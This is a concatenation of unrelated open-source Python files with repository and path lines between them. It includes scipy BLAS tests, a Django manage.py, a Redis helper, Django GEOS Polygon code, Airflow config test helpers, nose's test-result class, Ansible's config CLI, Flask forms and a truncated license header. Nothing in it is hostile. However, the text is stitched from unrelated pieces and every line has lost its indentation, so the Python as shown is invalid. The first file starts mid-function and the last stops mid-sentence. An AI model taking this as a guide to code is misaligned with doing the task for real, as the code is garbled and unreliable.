assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = solve(A, x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1, trans=1)
y2 = solve(A.T, x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1, trans=2)
y2 = solve(A.conj().T, x)
assert_array_almost_equal(y1, y2)
def test_trmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 3
A = (rand(n, n)+eye(n)).astype(dtype)
x = rand(3).astype(dtype)
func, = get_blas_funcs(('trmv',), dtype=dtype)
y1 = func(a=A, x=x)
y2 = triu(A).dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = triu(A).dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1, trans=1)
y2 = triu(A).T.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1, trans=2)
y2 = triu(A).conj().T.dot(x)
assert_array_almost_equal(y1, y2)
def test_trsv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 15
A = (rand(n, n)+eye(n)).astype(dtype)
x = rand(n).astype(dtype)
func, = get_blas_funcs(('trsv',), dtype=dtype)
y1 = func(a=A, x=x)
y2 = solve(triu(A), x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, lower=1)
y2 = solve(tril(A), x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = solve(triu(A), x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1, trans=1)
y2 = solve(triu(A).T, x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1, trans=2)
y2 = solve(triu(A).conj().T, x)
assert_array_almost_equal(y1, y2)
class TestFBLAS3Simple(object):
def test_gemm(self):
for p in 'sd':
f = getattr(fblas, p+'gemm', None)
if f is None:
continue
assert_array_almost_equal(f(3, [3], [-4]), [[-36]])
assert_array_almost_equal(f(3, [3], [-4], 3, [5]), [-21])
for p in 'cz':
f = getattr(fblas, p+'gemm', None)
if f is None:
continue
assert_array_almost_equal(f(3j, [3-4j], [-4]), [[-48-36j]])
assert_array_almost_equal(f(3j, [3-4j], [-4], 3, [5j]), [-48-21j])
def _get_func(func, ps='sdzc'):
"""Just a helper: return a specified BLAS function w/typecode."""
for p in ps:
f = getattr(fblas, p+func, None)
if f is None:
continue
yield f
class TestBLAS3Symm(object):
def setup_method(self):
self.a = np.array([[1., 2.],
[0., 1.]])
self.b = np.array([[1., 0., 3.],
[0., -1., 2.]])
self.c = np.ones((2, 3))
self.t = np.array([[2., -1., 8.],
[3., 0., 9.]])
def test_symm(self):
for f in _get_func('symm'):
res = f(a=self.a, b=self.b, c=self.c, alpha=1., beta=1.)
assert_array_almost_equal(res, self.t)
res = f(a=self.a.T, b=self.b, lower=1, c=self.c, alpha=1., beta=1.)
assert_array_almost_equal(res, self.t)
res = f(a=self.a, b=self.b.T, side=1, c=self.c.T,
alpha=1., beta=1.)
assert_array_almost_equal(res, self.t.T)
def test_summ_wrong_side(self):
f = getattr(fblas, 'dsymm', None)
if f is not None:
assert_raises(Exception, f, **{'a': self.a, 'b': self.b,
'alpha': 1, 'side': 1})
# `side=1` means C <- B*A, hence shapes of A and B are to be
# compatible. Otherwise, f2py exception is raised
def test_symm_wrong_uplo(self):
"""SYMM only considers the upper/lower part of A. Hence setting
wrong value for `lower` (default is lower=0, meaning upper triangle)
gives a wrong result.
"""
f = getattr(fblas, 'dsymm', None)
if f is not None:
res = f(a=self.a, b=self.b, c=self.c, alpha=1., beta=1.)
assert np.allclose(res, self.t)
res = f(a=self.a, b=self.b, lower=1, c=self.c, alpha=1., beta=1.)
assert not np.allclose(res, self.t)
class TestBLAS3Syrk(object):
def setup_method(self):
self.a = np.array([[1., 0.],
[0., -2.],
[2., 3.]])
self.t = np.array([[1., 0., 2.],
[0., 4., -6.],
[2., -6., 13.]])
self.tt = np.array([[5., 6.],
[6., 13.]])
def test_syrk(self):
for f in _get_func('syrk'):
c = f(a=self.a, alpha=1.)
assert_array_almost_equal(np.triu(c), np.triu(self.t))
c = f(a=self.a, alpha=1., lower=1)
assert_array_almost_equal(np.tril(c), np.tril(self.t))
c0 = np.ones(self.t.shape)
c = f(a=self.a, alpha=1., beta=1., c=c0)
assert_array_almost_equal(np.triu(c), np.triu(self.t+c0))
c = f(a=self.a, alpha=1., trans=1)
assert_array_almost_equal(np.triu(c), np.triu(self.tt))
# prints '0-th dimension must be fixed to 3 but got 5',
# FIXME: suppress?
# FIXME: how to catch the _fblas.error?
def test_syrk_wrong_c(self):
f = getattr(fblas, 'dsyrk', None)
if f is not None:
assert_raises(Exception, f, **{'a': self.a, 'alpha': 1.,
'c': np.ones((5, 8))})
# if C is supplied, it must have compatible dimensions
class TestBLAS3Syr2k(object):
def setup_method(self):
self.a = np.array([[1., 0.],
[0., -2.],
[2., 3.]])
self.b = np.array([[0., 1.],
[1., 0.],
[0, 1.]])
self.t = np.array([[0., -1., 3.],
[-1., 0., 0.],
[3., 0., 6.]])
self.tt = np.array([[0., 1.],
[1., 6]])
def test_syr2k(self):
for f in _get_func('syr2k'):
c = f(a=self.a, b=self.b, alpha=1.)
assert_array_almost_equal(np.triu(c), np.triu(self.t))
c = f(a=self.a, b=self.b, alpha=1., lower=1)
assert_array_almost_equal(np.tril(c), np.tril(self.t))
c0 = np.ones(self.t.shape)
c = f(a=self.a, b=self.b, alpha=1., beta=1., c=c0)
assert_array_almost_equal(np.triu(c), np.triu(self.t+c0))
c = f(a=self.a, b=self.b, alpha=1., trans=1)
assert_array_almost_equal(np.triu(c), np.triu(self.tt))
# prints '0-th dimension must be fixed to 3 but got 5', FIXME: suppress?
def test_syr2k_wrong_c(self):
f = getattr(fblas, 'dsyr2k', None)
if f is not None:
assert_raises(Exception, f, **{'a': self.a,
'b': self.b,
'alpha': 1.,
'c': np.zeros((15, 8))})
# if C is supplied, it must have compatible dimensions
class TestSyHe(object):
"""Quick and simple tests for (zc)-symm, syrk, syr2k."""
def setup_method(self):
self.sigma_y = np.array([[0., -1.j],
[1.j, 0.]])
def test_symm_zc(self):
for f in _get_func('symm', 'zc'):
# NB: a is symmetric w/upper diag of ONLY
res = f(a=self.sigma_y, b=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), np.diag([1, -1]))
def test_hemm_zc(self):
for f in _get_func('hemm', 'zc'):
# NB: a is hermitian w/upper diag of ONLY
res = f(a=self.sigma_y, b=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), np.diag([1, 1]))
def test_syrk_zr(self):
for f in _get_func('syrk', 'zc'):
res = f(a=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), np.diag([-1, -1]))
def test_herk_zr(self):
for f in _get_func('herk', 'zc'):
res = f(a=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), np.diag([1, 1]))
def test_syr2k_zr(self):
for f in _get_func('syr2k', 'zc'):
res = f(a=self.sigma_y, b=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), 2.*np.diag([-1, -1]))
def test_her2k_zr(self):
for f in _get_func('her2k', 'zc'):
res = f(a=self.sigma_y, b=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), 2.*np.diag([1, 1]))
class TestTRMM(object):
"""Quick and simple tests for dtrmm."""
def setup_method(self):
self.a = np.array([[1., 2., ],
[-2., 1.]])
self.b = np.array([[3., 4., -1.],
[5., 6., -2.]])
def test_ab(self):
f = getattr(fblas, 'dtrmm', None)
if f is not None:
result = f(1., self.a, self.b)
# default a is upper triangular
expected = np.array([[13., 16., -5.],
[5., 6., -2.]])
assert_array_almost_equal(result, expected)
def test_ab_lower(self):
f = getattr(fblas, 'dtrmm', None)
if f is not None:
result = f(1., self.a, self.b, lower=True)
expected = np.array([[3., 4., -1.],
[-1., -2., 0.]]) # now a is lower triangular
assert_array_almost_equal(result, expected)
def test_b_overwrites(self):
# BLAS dtrmm modifies B argument in-place.
# Here the default is to copy, but this can be overridden
f = getattr(fblas, 'dtrmm', None)
if f is not None:
for overwr in [True, False]:
bcopy = self.b.copy()
result = f(1., self.a, bcopy, overwrite_b=overwr)
# C-contiguous arrays are copied
assert_(bcopy.flags.f_contiguous is False and
np.may_share_memory(bcopy, result) is False)
assert_equal(bcopy, self.b)
bcopy = np.asfortranarray(self.b.copy()) # or just transpose it
result = f(1., self.a, bcopy, overwrite_b=True)
assert_(bcopy.flags.f_contiguous is True and
np.may_share_memory(bcopy, result) is True)
assert_array_almost_equal(bcopy, result)
def test_trsm():
seed(1234)
for ind, dtype in enumerate(DTYPES):
tol = np.finfo(dtype).eps*1000
func, = get_blas_funcs(('trsm',), dtype=dtype)
# Test protection against size mismatches
A = rand(4, 5).astype(dtype)
B = rand(4, 4).astype(dtype)
alpha = dtype(1)
assert_raises(Exception, func, alpha, A, B)
assert_raises(Exception, func, alpha, A.T, B)
n = 8
m = 7
alpha = dtype(-2.5)
A = (rand(m, m) if ind < 2 else rand(m, m) + rand(m, m)*1j) + eye(m)
A = A.astype(dtype)
Au = triu(A)
Al = tril(A)
B1 = rand(m, n).astype(dtype)
B2 = rand(n, m).astype(dtype)
x1 = func(alpha=alpha, a=A, b=B1)
assert_equal(B1.shape, x1.shape)
x2 = solve(Au, alpha*B1)
assert_allclose(x1, x2, atol=tol)
x1 = func(alpha=alpha, a=A, b=B1, trans_a=1)
x2 = solve(Au.T, alpha*B1)
assert_allclose(x1, x2, atol=tol)
x1 = func(alpha=alpha, a=A, b=B1, trans_a=2)
x2 = solve(Au.conj().T, alpha*B1)
assert_allclose(x1, x2, atol=tol)
x1 = func(alpha=alpha, a=A, b=B1, diag=1)
Au[arange(m), arange(m)] = dtype(1)
x2 = solve(Au, alpha*B1)
assert_allclose(x1, x2, atol=tol)
x1 = func(alpha=alpha, a=A, b=B2, diag=1, side=1)
x2 = solve(Au.conj().T, alpha*B2.conj().T)
assert_allclose(x1, x2.conj().T, atol=tol)
x1 = func(alpha=alpha, a=A, b=B2, diag=1, side=1, lower=1)
Al[arange(m), arange(m)] = dtype(1)
x2 = solve(Al.conj().T, alpha*B2.conj().T)
assert_allclose(x1, x2.conj().T, atol=tol)
|
ManoSeimas/mp-design
|
refs/heads/master
|
manage.py
|
1
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mp_design.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
JTarball/docker-django-polymer-starter-kit
|
refs/heads/master
|
docker/app/app/backend/apps/_archive/stats/utils.py
|
4
|
from datetime import datetime, timedelta
from redis import Redis
import subprocess
import time
import logging # import the logging library
# Get an instance of a logger
logger = logging.getLogger(__name__)
# Initialise Redis server
r_server = Redis()
def load_redis_db(filename):
"""Loads database"""
# copy
file1 = filename
file2 = "./temp.rdb"
conf = "./redis_secondary.conf"
subprocess.call(["cp", file1,file2])
subprocess.call(["./redis-server", "%s" %(conf)])
# to connect need to use strictserver via python redis
|
gkarlin/django-jenkins
|
refs/heads/master
|
build/Django/django/contrib/gis/geos/polygon.py
|
219
|
from ctypes import c_uint, byref
from django.contrib.gis.geos.geometry import GEOSGeometry
from django.contrib.gis.geos.libgeos import get_pointer_arr, GEOM_PTR
from django.contrib.gis.geos.linestring import LinearRing
from django.contrib.gis.geos import prototypes as capi
from django.utils import six
from django.utils.six.moves import xrange
class Polygon(GEOSGeometry):
_minlength = 1
def __init__(self, *args, **kwargs):
"""
Initializes on an exterior ring and a sequence of holes (both
instances may be either LinearRing instances, or a tuple/list
that may be constructed into a LinearRing).
Examples of initialization, where shell, hole1, and hole2 are
valid LinearRing geometries:
>>> poly = Polygon(shell, hole1, hole2)
>>> poly = Polygon(shell, (hole1, hole2))
Example where a tuple parameters are used:
>>> poly = Polygon(((0, 0), (0, 10), (10, 10), (0, 10), (0, 0)),
((4, 4), (4, 6), (6, 6), (6, 4), (4, 4)))
"""
if not args:
raise TypeError('Must provide at least one LinearRing, or a tuple, to initialize a Polygon.')
# Getting the ext_ring and init_holes parameters from the argument list
ext_ring = args[0]
init_holes = args[1:]
n_holes = len(init_holes)
# If initialized as Polygon(shell, (LinearRing, LinearRing)) [for backward-compatibility]
if n_holes == 1 and isinstance(init_holes[0], (tuple, list)):
if len(init_holes[0]) == 0:
init_holes = ()
n_holes = 0
elif isinstance(init_holes[0][0], LinearRing):
init_holes = init_holes[0]
n_holes = len(init_holes)
polygon = self._create_polygon(n_holes + 1, (ext_ring,) + init_holes)
super(Polygon, self).__init__(polygon, **kwargs)
def __iter__(self):
"Iterates over each ring in the polygon."
for i in xrange(len(self)):
yield self[i]
def __len__(self):
"Returns the number of rings in this Polygon."
return self.num_interior_rings + 1
@classmethod
def from_bbox(cls, bbox):
"Constructs a Polygon from a bounding box (4-tuple)."
x0, y0, x1, y1 = bbox
for z in bbox:
if not isinstance(z, six.integer_types + (float,)):
return GEOSGeometry('POLYGON((%s %s, %s %s, %s %s, %s %s, %s %s))' %
(x0, y0, x0, y1, x1, y1, x1, y0, x0, y0))
return Polygon(((x0, y0), (x0, y1), (x1, y1), (x1, y0), (x0, y0)))
### These routines are needed for list-like operation w/ListMixin ###
def _create_polygon(self, length, items):
# Instantiate LinearRing objects if necessary, but don't clone them yet
# _construct_ring will throw a TypeError if a parameter isn't a valid ring
# If we cloned the pointers here, we wouldn't be able to clean up
# in case of error.
rings = []
for r in items:
if isinstance(r, GEOM_PTR):
rings.append(r)
else:
rings.append(self._construct_ring(r))
shell = self._clone(rings.pop(0))
n_holes = length - 1
if n_holes:
holes = get_pointer_arr(n_holes)
for i, r in enumerate(rings):
holes[i] = self._clone(r)
holes_param = byref(holes)
else:
holes_param = None
return capi.create_polygon(shell, holes_param, c_uint(n_holes))
def _clone(self, g):
if isinstance(g, GEOM_PTR):
return capi.geom_clone(g)
else:
return capi.geom_clone(g.ptr)
def _construct_ring(self, param, msg='Parameter must be a sequence of LinearRings or objects that can initialize to LinearRings'):
"Helper routine for trying to construct a ring from the given parameter."
if isinstance(param, LinearRing): return param
try:
ring = LinearRing(param)
return ring
except TypeError:
raise TypeError(msg)
def _set_list(self, length, items):
# Getting the current pointer, replacing with the newly constructed
# geometry, and destroying the old geometry.
prev_ptr = self.ptr
srid = self.srid
self.ptr = self._create_polygon(length, items)
if srid: self.srid = srid
capi.destroy_geom(prev_ptr)
def _get_single_internal(self, index):
"""
Returns the ring at the specified index. The first index, 0, will
always return the exterior ring. Indices > 0 will return the
interior ring at the given index (e.g., poly[1] and poly[2] would
return the first and second interior ring, respectively).
CAREFUL: Internal/External are not the same as Interior/Exterior!
_get_single_internal returns a pointer from the existing geometries for use
internally by the object's methods. _get_single_external returns a clone
of the same geometry for use by external code.
"""
if index == 0:
return capi.get_extring(self.ptr)
else:
# Getting the interior ring, have to subtract 1 from the index.
return capi.get_intring(self.ptr, index-1)
def _get_single_external(self, index):
return GEOSGeometry(capi.geom_clone(self._get_single_internal(index)), srid=self.srid)
_set_single = GEOSGeometry._set_single_rebuild
_assign_extended_slice = GEOSGeometry._assign_extended_slice_rebuild
#### Polygon Properties ####
@property
def num_interior_rings(self):
"Returns the number of interior rings."
# Getting the number of rings
return capi.get_nrings(self.ptr)
def _get_ext_ring(self):
"Gets the exterior ring of the Polygon."
return self[0]
def _set_ext_ring(self, ring):
"Sets the exterior ring of the Polygon."
self[0] = ring
# Properties for the exterior ring/shell.
exterior_ring = property(_get_ext_ring, _set_ext_ring)
shell = exterior_ring
@property
def tuple(self):
"Gets the tuple for each ring in this Polygon."
return tuple([self[i].tuple for i in xrange(len(self))])
coords = tuple
@property
def kml(self):
"Returns the KML representation of this Polygon."
inner_kml = ''.join(["<innerBoundaryIs>%s</innerBoundaryIs>" % self[i+1].kml
for i in xrange(self.num_interior_rings)])
return "<Polygon><outerBoundaryIs>%s</outerBoundaryIs>%s</Polygon>" % (self[0].kml, inner_kml)
|
abenzbiria/clients_odoo
|
refs/heads/master
|
addons/website/tests/__init__.py
|
396
|
# -*- coding: utf-8 -*-
import test_converter
import test_crawl
import test_ui
import test_views
|
sekikn/incubator-airflow
|
refs/heads/master
|
tests/test_utils/config.py
|
8
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import contextlib
import os
from airflow import settings
from airflow.configuration import conf
@contextlib.contextmanager
def conf_vars(overrides):
original = {}
original_env_vars = {}
for (section, key), value in overrides.items():
env = conf._env_var_name(section, key)
if env in os.environ:
original_env_vars[env] = os.environ.pop(env)
if conf.has_option(section, key):
original[(section, key)] = conf.get(section, key)
else:
original[(section, key)] = None
if value is not None:
conf.set(section, key, value)
else:
conf.remove_option(section, key)
settings.configure_vars()
try:
yield
finally:
for (section, key), value in original.items():
if value is not None:
conf.set(section, key, value)
else:
conf.remove_option(section, key)
for env, value in original_env_vars.items():
os.environ[env] = value
settings.configure_vars()
@contextlib.contextmanager
def env_vars(overrides):
orig_vars = {}
new_vars = []
for (section, key), value in overrides.items():
env = conf._env_var_name(section, key)
if env in os.environ:
orig_vars[env] = os.environ.pop(env, '')
else:
new_vars.append(env)
os.environ[env] = value
try:
yield
finally:
for env, value in orig_vars.items():
os.environ[env] = value
for env in new_vars:
os.environ.pop(env)
|
axbaretto/beam
|
refs/heads/master
|
sdks/python/.eggs/nose-1.3.7-py2.7.egg/nose/result.py
|
68
|
"""
Test Result
-----------
Provides a TextTestResult that extends unittest's _TextTestResult to
provide support for error classes (such as the builtin skip and
deprecated classes), and hooks for plugins to take over or extend
reporting.
"""
import logging
try:
# 2.7+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
from nose.config import Config
from nose.util import isclass, ln as _ln # backwards compat
log = logging.getLogger('nose.result')
def _exception_detail(exc):
# this is what stdlib module traceback does
try:
return str(exc)
except:
return '<unprintable %s object>' % type(exc).__name__
class TextTestResult(_TextTestResult):
"""Text test result that extends unittest's default test result
support for a configurable set of errorClasses (eg, Skip,
Deprecated, TODO) that extend the errors/failures/success triad.
"""
def __init__(self, stream, descriptions, verbosity, config=None,
errorClasses=None):
if errorClasses is None:
errorClasses = {}
self.errorClasses = errorClasses
if config is None:
config = Config()
self.config = config
_TextTestResult.__init__(self, stream, descriptions, verbosity)
def addSkip(self, test, reason):
# 2.7 skip compat
from nose.plugins.skip import SkipTest
if SkipTest in self.errorClasses:
storage, label, isfail = self.errorClasses[SkipTest]
storage.append((test, reason))
self.printLabel(label, (SkipTest, reason, None))
def addError(self, test, err):
"""Overrides normal addError to add support for
errorClasses. If the exception is a registered class, the
error will be added to the list for that class, not errors.
"""
ec, ev, tb = err
try:
exc_info = self._exc_info_to_string(err, test)
except TypeError:
# 2.3 compat
exc_info = self._exc_info_to_string(err)
for cls, (storage, label, isfail) in self.errorClasses.items():
#if 'Skip' in cls.__name__ or 'Skip' in ec.__name__:
# from nose.tools import set_trace
# set_trace()
if isclass(ec) and issubclass(ec, cls):
if isfail:
test.passed = False
storage.append((test, exc_info))
self.printLabel(label, err)
return
self.errors.append((test, exc_info))
test.passed = False
self.printLabel('ERROR')
# override to bypass changes in 2.7
def getDescription(self, test):
if self.descriptions:
return test.shortDescription() or str(test)
else:
return str(test)
def printLabel(self, label, err=None):
# Might get patched into a streamless result
stream = getattr(self, 'stream', None)
if stream is not None:
if self.showAll:
message = [label]
if err:
detail = _exception_detail(err[1])
if detail:
message.append(detail)
stream.writeln(": ".join(message))
elif self.dots:
stream.write(label[:1])
def printErrors(self):
"""Overrides to print all errorClasses errors as well.
"""
_TextTestResult.printErrors(self)
for cls in self.errorClasses.keys():
storage, label, isfail = self.errorClasses[cls]
if isfail:
self.printErrorList(label, storage)
# Might get patched into a result with no config
if hasattr(self, 'config'):
self.config.plugins.report(self.stream)
def printSummary(self, start, stop):
"""Called by the test runner to print the final summary of test
run results.
"""
write = self.stream.write
writeln = self.stream.writeln
taken = float(stop - start)
run = self.testsRun
plural = run != 1 and "s" or ""
writeln(self.separator2)
writeln("Ran %s test%s in %.3fs" % (run, plural, taken))
writeln()
summary = {}
eckeys = self.errorClasses.keys()
for cls in eckeys:
storage, label, isfail = self.errorClasses[cls]
count = len(storage)
if not count:
continue
summary[label] = count
if len(self.failures):
summary['failures'] = len(self.failures)
if len(self.errors):
summary['errors'] = len(self.errors)
if not self.wasSuccessful():
write("FAILED")
else:
write("OK")
items = summary.items()
if items:
items.sort()
write(" (")
write(", ".join(["%s=%s" % (label, count) for
label, count in items]))
writeln(")")
else:
writeln()
def wasSuccessful(self):
"""Overrides to check that there are no errors in errorClasses
lists that are marked as errors and should cause a run to
fail.
"""
if self.errors or self.failures:
return False
for cls in self.errorClasses.keys():
storage, label, isfail = self.errorClasses[cls]
if not isfail:
continue
if storage:
return False
return True
def _addError(self, test, err):
try:
exc_info = self._exc_info_to_string(err, test)
except TypeError:
# 2.3: does not take test arg
exc_info = self._exc_info_to_string(err)
self.errors.append((test, exc_info))
if self.showAll:
self.stream.write('ERROR')
elif self.dots:
self.stream.write('E')
def _exc_info_to_string(self, err, test=None):
# 2.7 skip compat
from nose.plugins.skip import SkipTest
if isclass(err[0]) and issubclass(err[0], SkipTest):
return str(err[1])
# 2.3/2.4 -- 2.4 passes test, 2.3 does not
try:
return _TextTestResult._exc_info_to_string(self, err, test)
except TypeError:
# 2.3: does not take test arg
return _TextTestResult._exc_info_to_string(self, err)
def ln(*arg, **kw):
from warnings import warn
warn("ln() has moved to nose.util from nose.result and will be removed "
"from nose.result in a future release. Please update your imports ",
DeprecationWarning)
return _ln(*arg, **kw)
|
tonk/ansible
|
refs/heads/devel
|
lib/ansible/cli/config.py
|
47
|
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import shlex
import subprocess
import yaml
from ansible import context
from ansible.cli import CLI
from ansible.cli.arguments import option_helpers as opt_help
from ansible.config.manager import ConfigManager, Setting, find_ini_config_file
from ansible.errors import AnsibleError, AnsibleOptionsError
from ansible.module_utils._text import to_native, to_text, to_bytes
from ansible.parsing.yaml.dumper import AnsibleDumper
from ansible.utils.color import stringc
from ansible.utils.display import Display
from ansible.utils.path import unfrackpath
display = Display()
class ConfigCLI(CLI):
""" Config command line class """
def __init__(self, args, callback=None):
self.config_file = None
self.config = None
super(ConfigCLI, self).__init__(args, callback)
def init_parser(self):
super(ConfigCLI, self).init_parser(
desc="View ansible configuration.",
)
common = opt_help.argparse.ArgumentParser(add_help=False)
opt_help.add_verbosity_options(common)
common.add_argument('-c', '--config', dest='config_file',
help="path to configuration file, defaults to first file found in precedence.")
subparsers = self.parser.add_subparsers(dest='action')
subparsers.required = True
list_parser = subparsers.add_parser('list', help='Print all config options', parents=[common])
list_parser.set_defaults(func=self.execute_list)
dump_parser = subparsers.add_parser('dump', help='Dump configuration', parents=[common])
dump_parser.set_defaults(func=self.execute_dump)
dump_parser.add_argument('--only-changed', dest='only_changed', action='store_true',
help="Only show configurations that have changed from the default")
view_parser = subparsers.add_parser('view', help='View configuration file', parents=[common])
view_parser.set_defaults(func=self.execute_view)
# update_parser = subparsers.add_parser('update', help='Update configuration option')
# update_parser.set_defaults(func=self.execute_update)
# update_parser.add_argument('-s', '--setting', dest='setting',
# help="config setting, the section defaults to 'defaults'",
# metavar='[section.]setting=value')
# search_parser = subparsers.add_parser('search', help='Search configuration')
# search_parser.set_defaults(func=self.execute_search)
# search_parser.add_argument('args', help='Search term', metavar='<search term>')
def post_process_args(self, options):
options = super(ConfigCLI, self).post_process_args(options)
display.verbosity = options.verbosity
return options
def run(self):
super(ConfigCLI, self).run()
if context.CLIARGS['config_file']:
self.config_file = unfrackpath(context.CLIARGS['config_file'], follow=False)
b_config = to_bytes(self.config_file)
if os.path.exists(b_config) and os.access(b_config, os.R_OK):
self.config = ConfigManager(self.config_file)
else:
raise AnsibleOptionsError('The provided configuration file is missing or not accessible: %s' % to_native(self.config_file))
else:
self.config = ConfigManager()
self.config_file = find_ini_config_file()
if self.config_file:
try:
if not os.path.exists(self.config_file):
raise AnsibleOptionsError("%s does not exist or is not accessible" % (self.config_file))
elif not os.path.isfile(self.config_file):
raise AnsibleOptionsError("%s is not a valid file" % (self.config_file))
os.environ['ANSIBLE_CONFIG'] = to_native(self.config_file)
except Exception:
if context.CLIARGS['action'] in ['view']:
raise
elif context.CLIARGS['action'] in ['edit', 'update']:
display.warning("File does not exist, used empty file: %s" % self.config_file)
elif context.CLIARGS['action'] == 'view':
raise AnsibleError('Invalid or no config file was supplied')
context.CLIARGS['func']()
def execute_update(self):
'''
Updates a single setting in the specified ansible.cfg
'''
raise AnsibleError("Option not implemented yet")
# pylint: disable=unreachable
if context.CLIARGS['setting'] is None:
raise AnsibleOptionsError("update option requires a setting to update")
(entry, value) = context.CLIARGS['setting'].split('=')
if '.' in entry:
(section, option) = entry.split('.')
else:
section = 'defaults'
option = entry
subprocess.call([
'ansible',
'-m', 'ini_file',
'localhost',
'-c', 'local',
'-a', '"dest=%s section=%s option=%s value=%s backup=yes"' % (self.config_file, section, option, value)
])
def execute_view(self):
'''
Displays the current config file
'''
try:
with open(self.config_file, 'rb') as f:
self.pager(to_text(f.read(), errors='surrogate_or_strict'))
except Exception as e:
raise AnsibleError("Failed to open config file: %s" % to_native(e))
def execute_edit(self):
'''
Opens ansible.cfg in the default EDITOR
'''
raise AnsibleError("Option not implemented yet")
# pylint: disable=unreachable
try:
editor = shlex.split(os.environ.get('EDITOR', 'vi'))
editor.append(self.config_file)
subprocess.call(editor)
except Exception as e:
raise AnsibleError("Failed to open editor: %s" % to_native(e))
def execute_list(self):
'''
list all current configs reading lib/constants.py and shows env and config file setting names
'''
self.pager(to_text(yaml.dump(self.config.get_configuration_definitions(), Dumper=AnsibleDumper), errors='surrogate_or_strict'))
def execute_dump(self):
'''
Shows the current settings, merges ansible.cfg if specified
'''
# FIXME: deal with plugins, not just base config
text = []
defaults = self.config.get_configuration_definitions().copy()
for setting in self.config.data.get_settings():
if setting.name in defaults:
defaults[setting.name] = setting
for setting in sorted(defaults):
if isinstance(defaults[setting], Setting):
if defaults[setting].origin == 'default':
color = 'green'
else:
color = 'yellow'
msg = "%s(%s) = %s" % (setting, defaults[setting].origin, defaults[setting].value)
else:
color = 'green'
msg = "%s(%s) = %s" % (setting, 'default', defaults[setting].get('default'))
if not context.CLIARGS['only_changed'] or color == 'yellow':
text.append(stringc(msg, color))
self.pager(to_text('\n'.join(text), errors='surrogate_or_strict'))
|
lefloh/notejam
|
refs/heads/master
|
flask/notejam/forms.py
|
6
|
from flask.ext.wtf import (Form, TextField, PasswordField,
SelectField, TextAreaField)
from flask.ext.wtf import Required, Email, EqualTo, ValidationError
from notejam.models import User, Pad
class SigninForm(Form):
email = TextField('Email', validators=[Required(), Email()])
password = PasswordField('Password', validators=[Required()])
class SignupForm(Form):
email = TextField('Email', validators=[Required(), Email()])
password = PasswordField('Password', validators=[Required()])
repeat_password = PasswordField(
'Repeat Password',
validators=[
Required(), EqualTo(
'password', message="Your passwords do not match"
)
]
)
def validate_email(self, field):
if User.query.filter_by(email=field.data).count():
raise ValidationError(
'User with this email is already signed up'
)
class NoteForm(Form):
name = TextField('Name', validators=[Required()])
text = TextAreaField('Note', validators=[Required()])
pad = SelectField('Pad', choices=[], coerce=int)
# @TODO use wtforms.ext.sqlalchemy.fields.QuerySelectField?
def __init__(self, user=None, **kwargs):
super(NoteForm, self).__init__(**kwargs)
self.pad.choices = [(0, '---------')] + [
(p.id, p.name) for p in Pad.query.filter_by(user=user)
]
class PadForm(Form):
name = TextField('Name', validators=[Required()])
# dummy form
class DeleteForm(Form):
pass
class ChangePasswordForm(Form):
old_password = PasswordField('Old Password', validators=[Required()])
new_password = PasswordField('New Password', validators=[Required()])
repeat_new_password = PasswordField(
'Repeat New Password',
validators=[
Required(), EqualTo(
'new_password', message="Your passwords don't match"
)
]
)
def __init__(self, **kwargs):
super(ChangePasswordForm, self).__init__(**kwargs)
self.user = kwargs['user']
def validate_old_password(self, field):
if not self.user.check_password(field.data):
raise ValidationError(
'Incorrect old password'
)
class ForgotPasswordForm(Form):
email = TextField('Email', validators=[Required(), Email()])
def validate_email(self, field):
if not User.query.filter_by(email=field.data).count():
raise ValidationError(
'No user with given email found'
)
|
EiSandi/greetingslack
|
refs/heads/master
|
greetingslack/lib/python2.7/site-packages/pip/_vendor/progress/__init__.py
|
916
|
# Copyright (c) 2012 Giorgos Verigakis <verigak@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
